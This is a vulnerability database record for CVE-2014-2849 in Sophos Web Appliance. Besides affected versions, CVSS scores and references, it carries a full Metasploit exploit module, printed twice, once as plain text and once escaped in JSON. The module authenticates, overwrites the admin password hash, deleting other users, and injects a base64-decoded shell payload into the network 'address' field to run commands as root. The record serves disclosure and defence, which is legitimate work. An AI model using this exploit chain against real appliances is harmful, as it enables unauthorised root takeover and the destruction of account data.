var-201404-0438
Vulnerability from variot
The Change Password dialog box (change_password) in Sophos Web Appliance before 3.8.2 allows remote authenticated users to change the admin user password via a crafted request. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Sophos Web Appliance. Authentication is required to exploit this vulnerability.The specific flaws exist within the change_password and netinterface functions of the web appliance. The first flaw will allow for an unprivileged user to change the admin's password and a remote code execution vulnerability exists when updating the network interface. This allows for an attacker to execute under root privileges. Successfully exploiting these issues will result in the complete compromise of affected computers. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. ##
This module requires Metasploit: http//metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) super(update_info(info, 'Name' => 'Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution', 'Description' => %q{ This module takes advantage of two vulnerabilities in order to gain remote code execution as root as an otherwise non-privileged authorized user. No server-side sanitization is done on values passed when configuring a static network interface. This allows an administrator user to run arbitrary commands in the context of the web application, which is root when configuring the network interface. This module will inadvertently delete any other users that may have been present as a side effect of changing the admin's password. }, 'Author' => [ 'Brandon Perry bperry.volatile@gmail.com' # discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-069/'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => true, 'Payload' => { 'Space' => 500, 'DisableNops' => true, 'BadChars' => "", #base64 encryption ftw! 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet' } }, 'Targets' => [ [ 'Sophos Web Protection Appliance 3.8.1.1', { }] ], 'DefaultOptions' => { 'SSL' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 8 2014' ))
register_options(
[
OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
OptString.new('PASSWORD', [true, 'The password to authenticate with', nil]),
OptString.new('TARGETURI', [true, 'The target URI', '/']),
Opt::RPORT(443)
],
self.class
)
end
def exploit init = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php') })
if !init or !init.body
fail_with("Could not connect to host")
end
print_status("Getting STYLE key...")
style = ''
init.body.each_line do |line|
next if line !~ /name="STYLE" value="(.*)"/
style = $1
end
if style == ''
fail_with("Could not find style key.")
end
post = {
'STYLE' => style,
'destination' => '',
'section' => '',
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
print_status("Authenticating as " + datastore['USERNAME'])
login = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/index.php?c=login'),
'method' => 'POST',
'vars_post' => post
})
if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/
fail_with("Authentication failed")
end
#I don't know what salt is being used to hash these
#passwords (probably in js somewhere), so I have
#to use a static one that I saw being POSTed while
#exploring, it is 'notpassword'.
#
#This will actually delete every other user that exists
#except for admin, whose password will be changed
#
#whoops
admin_hash = '[{"id": "default_admin", "username": "admin", "name": "Default Administrator"'
admin_hash << ', "password": "70ec23d3e019a307081732c0162b2733", "description": "Default '
admin_hash << 'Administrator Account", "admin": true, "roles": ["admin"], "reporting_groups"'
admin_hash << ': [], "user_id": 0}]'
post = {
'action' => 'save',
'STYLE' => style,
'username' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['USERNAME'])),
'current' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
'new' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
'admins' => admin_hash
}
print_status("Changing old password hash to notpassword")
passchange = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/index.php?c=change_password'),
'method' => 'POST',
'vars_post' => post
})
if !passchange or passchange.code != 200
fail_with("Couldn't update admin's password")
end
print_status("Logging in as the admin now")
init = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php')
})
if !init or init.code != 200
fail_with("Couldn't reget index page for admin auth")
end
init.body.each_line do |line|
next if line !~ /name="STYLE" value="(.*)"/
style = $1
end
post = {
'STYLE' => style,
'destination' => '',
'section' => '',
'username' => 'admin',
'password' => 'notpassword'
}
login = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php?c=login'),
'method' => 'POST',
'vars_post' => post
})
if !login or login.code != 200 or login.body !~ /admin<\/a>/
fail_with("Couldn't login as admin")
end
pay = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded))
post = {
'STYLE' => style,
'dhcp' => 'no',
'address' => "192.16`echo #{pay}|base64 --decode|sh`8.1.16",
'gateway' => '192.168.1.254',
'sb_bridge' => 'explicit',
'netmask' => '255.255.255.0',
'sb_linktype' => 'auto',
'dns' => 'yes',
'dns1' => '192.168.1.254',
'dns2' => '',
'dns3' => ''
}
print_status("Sending payload")
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php?c=netinterface'),
'method' => 'POST',
'vars_post' => post,
})
end end
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.4.5"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.4.8"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.4.7"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.5.1.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.5.3"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.4.6"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.5.0"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.5.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.5.2"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "sophos",
"version": "3.5.1.2"
},
{
"_id": null,
"model": "web appliance",
"scope": null,
"trust": 1.5,
"vendor": "sophos",
"version": null
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.2.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.4.2"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.2.2.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.2.3"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.3"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.2.4.0"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.0"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.0"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.1.0.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.2"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.0"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.2"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.8.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.9.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.2"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.1.3"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.1.0"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.0.0"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.4.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.8.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.6.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.2.5"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.5.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.2"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.8.2"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.3"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.3"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.6"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.5"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.2.3"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.4"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.0.5"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.4.3.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.0.1.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.5"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.3.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.5.6"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.2.7"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.3"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.0.2"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.4"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.7"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.8"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.2.4.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.4"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.1.4"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.2.4"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.2.6"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": null
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.1.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "lte",
"trust": 1.0,
"vendor": "sophos",
"version": "3.8.1.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.1.2"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.5.4"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.4"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.0.5.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.3.6"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.2.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.5.5"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.8.0"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.6.1.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.7.9"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.0.4"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.0.1"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.2.2"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 1.0,
"vendor": "sophos",
"version": "3.0.3"
},
{
"_id": null,
"model": "web appliance",
"scope": "lt",
"trust": 0.8,
"vendor": "sophos",
"version": "3.8.2"
},
{
"_id": null,
"model": "web appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "sophos",
"version": "3.0"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-14-069"
},
{
"db": "BID",
"id": "66734"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002000"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-157"
},
{
"db": "NVD",
"id": "CVE-2014-2849"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:sophos:web_appliance",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:sophos:web_appliance_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-002000"
}
]
},
"credits": {
"_id": null,
"data": "Brandon Perry",
"sources": [
{
"db": "ZDI",
"id": "ZDI-14-069"
},
{
"db": "BID",
"id": "66734"
},
{
"db": "PACKETSTORM",
"id": "126099"
}
],
"trust": 1.1
},
"cve": "CVE-2014-2849",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 8.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"id": "CVE-2014-2849",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "ZDI",
"availabilityImpact": "COMPLETE",
"baseScore": 8.5,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.8,
"id": "CVE-2014-2849",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.7,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 8.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"id": "VHN-70788",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:N/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-2849",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2014-2849",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2014-2849",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201404-157",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-70788",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-14-069"
},
{
"db": "VULHUB",
"id": "VHN-70788"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002000"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-157"
},
{
"db": "NVD",
"id": "CVE-2014-2849"
}
]
},
"description": {
"_id": null,
"data": "The Change Password dialog box (change_password) in Sophos Web Appliance before 3.8.2 allows remote authenticated users to change the admin user password via a crafted request. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Sophos Web Appliance. Authentication is required to exploit this vulnerability.The specific flaws exist within the change_password and netinterface functions of the web appliance. The first flaw will allow for an unprivileged user to change the admin\u0027s password and a remote code execution vulnerability exists when updating the network interface. This allows for an attacker to execute under root privileges. Successfully exploiting these issues will result in the complete compromise of affected computers. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. ##\n# This module requires Metasploit: http//metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire \u0027msf/core\u0027\n\nclass Metasploit3 \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n \u0027Name\u0027 =\u003e \u0027Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module takes advantage of two vulnerabilities in order to gain remote code execution as root\n as an otherwise non-privileged authorized user. \n No server-side sanitization is done on values passed when configuring a static network interface. \n This allows an administrator user to run arbitrary commands in the context of the web application,\n which is root when configuring the network interface. This module will inadvertently delete\n any other users that may have been present as a side effect of changing the admin\u0027s password. \n },\n \u0027Author\u0027 =\u003e\n [\n \u0027Brandon Perry \u003cbperry.volatile@gmail.com\u003e\u0027 # discovery and Metasploit module\n ],\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027References\u0027 =\u003e\n [\n [\u0027URL\u0027, \u0027http://www.zerodayinitiative.com/advisories/ZDI-14-069/\u0027]\n ],\n \u0027Platform\u0027 =\u003e [\u0027unix\u0027],\n \u0027Arch\u0027 =\u003e ARCH_CMD,\n \u0027Privileged\u0027 =\u003e true,\n \u0027Payload\u0027 =\u003e\n {\n \u0027Space\u0027 =\u003e 500,\n \u0027DisableNops\u0027 =\u003e true,\n \u0027BadChars\u0027 =\u003e \"\", #base64 encryption ftw!\n \u0027Compat\u0027 =\u003e\n {\n \u0027PayloadType\u0027 =\u003e \u0027cmd\u0027,\n \u0027RequiredCmd\u0027 =\u003e \u0027generic telnet\u0027\n }\n },\n \u0027Targets\u0027 =\u003e\n [\n [ \u0027Sophos Web Protection Appliance 3.8.1.1\u0027, { }]\n ],\n \u0027DefaultOptions\u0027 =\u003e\n {\n \u0027SSL\u0027 =\u003e true\n },\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027DisclosureDate\u0027 =\u003e \u0027Apr 8 2014\u0027\n ))\n\n register_options(\n [\n OptString.new(\u0027USERNAME\u0027, [true, \u0027The username to authenticate as\u0027, nil]),\n OptString.new(\u0027PASSWORD\u0027, [true, \u0027The password to authenticate with\u0027, nil]),\n OptString.new(\u0027TARGETURI\u0027, [true, \u0027The target URI\u0027, \u0027/\u0027]),\n Opt::RPORT(443)\n ],\n self.class\n )\n end\n\n def exploit\n init = send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027index.php\u0027)\n })\n\n if !init or !init.body\n fail_with(\"Could not connect to host\")\n end\n\n print_status(\"Getting STYLE key...\")\n\n style = \u0027\u0027\n init.body.each_line do |line|\n next if line !~ /name=\"STYLE\" value=\"(.*)\"/\n style = $1\n end\n\n if style == \u0027\u0027\n fail_with(\"Could not find style key.\")\n end\n\n post = {\n \u0027STYLE\u0027 =\u003e style,\n \u0027destination\u0027 =\u003e \u0027\u0027,\n \u0027section\u0027 =\u003e \u0027\u0027,\n \u0027username\u0027 =\u003e datastore[\u0027USERNAME\u0027],\n \u0027password\u0027 =\u003e datastore[\u0027PASSWORD\u0027]\n }\n\n print_status(\"Authenticating as \" + datastore[\u0027USERNAME\u0027])\n login = send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027/index.php?c=login\u0027),\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027vars_post\u0027 =\u003e post\n })\n\n if !login or login.code != 200 or login.body !~ /#{datastore[\u0027USERNAME\u0027]}\u003c\\/a\u003e/\n fail_with(\"Authentication failed\")\n end\n\n #I don\u0027t know what salt is being used to hash these\n #passwords (probably in js somewhere), so I have\n #to use a static one that I saw being POSTed while\n #exploring, it is \u0027notpassword\u0027. \n #\n #This will actually delete every other user that exists\n #except for admin, whose password will be changed\n #\n #whoops\n admin_hash = \u0027[{\"id\": \"default_admin\", \"username\": \"admin\", \"name\": \"Default Administrator\"\u0027\n admin_hash \u003c\u003c \u0027, \"password\": \"70ec23d3e019a307081732c0162b2733\", \"description\": \"Default \u0027\n admin_hash \u003c\u003c \u0027Administrator Account\", \"admin\": true, \"roles\": [\"admin\"], \"reporting_groups\"\u0027\n admin_hash \u003c\u003c \u0027: [], \"user_id\": 0}]\u0027\n\n post = {\n \u0027action\u0027 =\u003e \u0027save\u0027,\n \u0027STYLE\u0027 =\u003e style,\n \u0027username\u0027 =\u003e Rex::Text.uri_encode(Rex::Text.encode_base64(datastore[\u0027USERNAME\u0027])),\n \u0027current\u0027 =\u003e Rex::Text.uri_encode(Rex::Text.encode_base64(datastore[\u0027PASSWORD\u0027])),\n \u0027new\u0027 =\u003e Rex::Text.uri_encode(Rex::Text.encode_base64(datastore[\u0027PASSWORD\u0027])),\n \u0027admins\u0027 =\u003e admin_hash\n }\n\n print_status(\"Changing old password hash to notpassword\")\n passchange = send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027/index.php?c=change_password\u0027),\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027vars_post\u0027 =\u003e post\n })\n\n if !passchange or passchange.code != 200\n fail_with(\"Couldn\u0027t update admin\u0027s password\")\n end\n\n print_status(\"Logging in as the admin now\")\n init = send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027index.php\u0027)\n })\n\n if !init or init.code != 200\n fail_with(\"Couldn\u0027t reget index page for admin auth\")\n end\n\n init.body.each_line do |line|\n next if line !~ /name=\"STYLE\" value=\"(.*)\"/\n style = $1\n end\n\n post = {\n \u0027STYLE\u0027 =\u003e style,\n \u0027destination\u0027 =\u003e \u0027\u0027,\n \u0027section\u0027 =\u003e \u0027\u0027,\n \u0027username\u0027 =\u003e \u0027admin\u0027,\n \u0027password\u0027 =\u003e \u0027notpassword\u0027\n }\n\n login = send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027index.php?c=login\u0027),\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027vars_post\u0027 =\u003e post\n })\n\n if !login or login.code != 200 or login.body !~ /admin\u003c\\/a\u003e/\n fail_with(\"Couldn\u0027t login as admin\")\n end\n\n pay = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded))\n post = {\n \u0027STYLE\u0027 =\u003e style,\n \u0027dhcp\u0027 =\u003e \u0027no\u0027,\n \u0027address\u0027 =\u003e \"192.16`echo #{pay}|base64 --decode|sh`8.1.16\",\n \u0027gateway\u0027 =\u003e \u0027192.168.1.254\u0027,\n \u0027sb_bridge\u0027 =\u003e \u0027explicit\u0027,\n \u0027netmask\u0027 =\u003e \u0027255.255.255.0\u0027,\n \u0027sb_linktype\u0027 =\u003e \u0027auto\u0027,\n \u0027dns\u0027 =\u003e \u0027yes\u0027,\n \u0027dns1\u0027 =\u003e \u0027192.168.1.254\u0027,\n \u0027dns2\u0027 =\u003e \u0027\u0027,\n \u0027dns3\u0027 =\u003e \u0027\u0027\n }\n\n print_status(\"Sending payload\")\n send_request_cgi({\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027index.php?c=netinterface\u0027),\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027vars_post\u0027 =\u003e post,\n })\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-2849"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002000"
},
{
"db": "ZDI",
"id": "ZDI-14-069"
},
{
"db": "BID",
"id": "66734"
},
{
"db": "VULHUB",
"id": "VHN-70788"
},
{
"db": "PACKETSTORM",
"id": "126099"
}
],
"trust": 2.7
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-70788",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-70788"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2014-2849",
"trust": 3.5
},
{
"db": "ZDI",
"id": "ZDI-14-069",
"trust": 2.5
},
{
"db": "BID",
"id": "66734",
"trust": 2.0
},
{
"db": "EXPLOIT-DB",
"id": "32789",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "57706",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002000",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-2026",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201404-157",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-70788",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126099",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-14-069"
},
{
"db": "VULHUB",
"id": "VHN-70788"
},
{
"db": "BID",
"id": "66734"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002000"
},
{
"db": "PACKETSTORM",
"id": "126099"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-157"
},
{
"db": "NVD",
"id": "CVE-2014-2849"
}
]
},
"id": "VAR-201404-0438",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-70788"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:08:21.272000Z",
"patch": {
"_id": null,
"data": [
{
"title": "120230",
"trust": 1.5,
"url": "http://www.sophos.com/en-us/support/knowledgebase/120230.aspx"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-14-069"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002000"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-70788"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-002000"
},
{
"db": "NVD",
"id": "CVE-2014-2849"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.4,
"url": "http://www.sophos.com/en-us/support/knowledgebase/120230.aspx"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/66734"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/32789"
},
{
"trust": 1.7,
"url": "http://www.zerodayinitiative.com/advisories/zdi-14-069/"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/57706"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2849"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2849"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com/advisories/zdi-14-069/\u0027]"
},
{
"trust": 0.1,
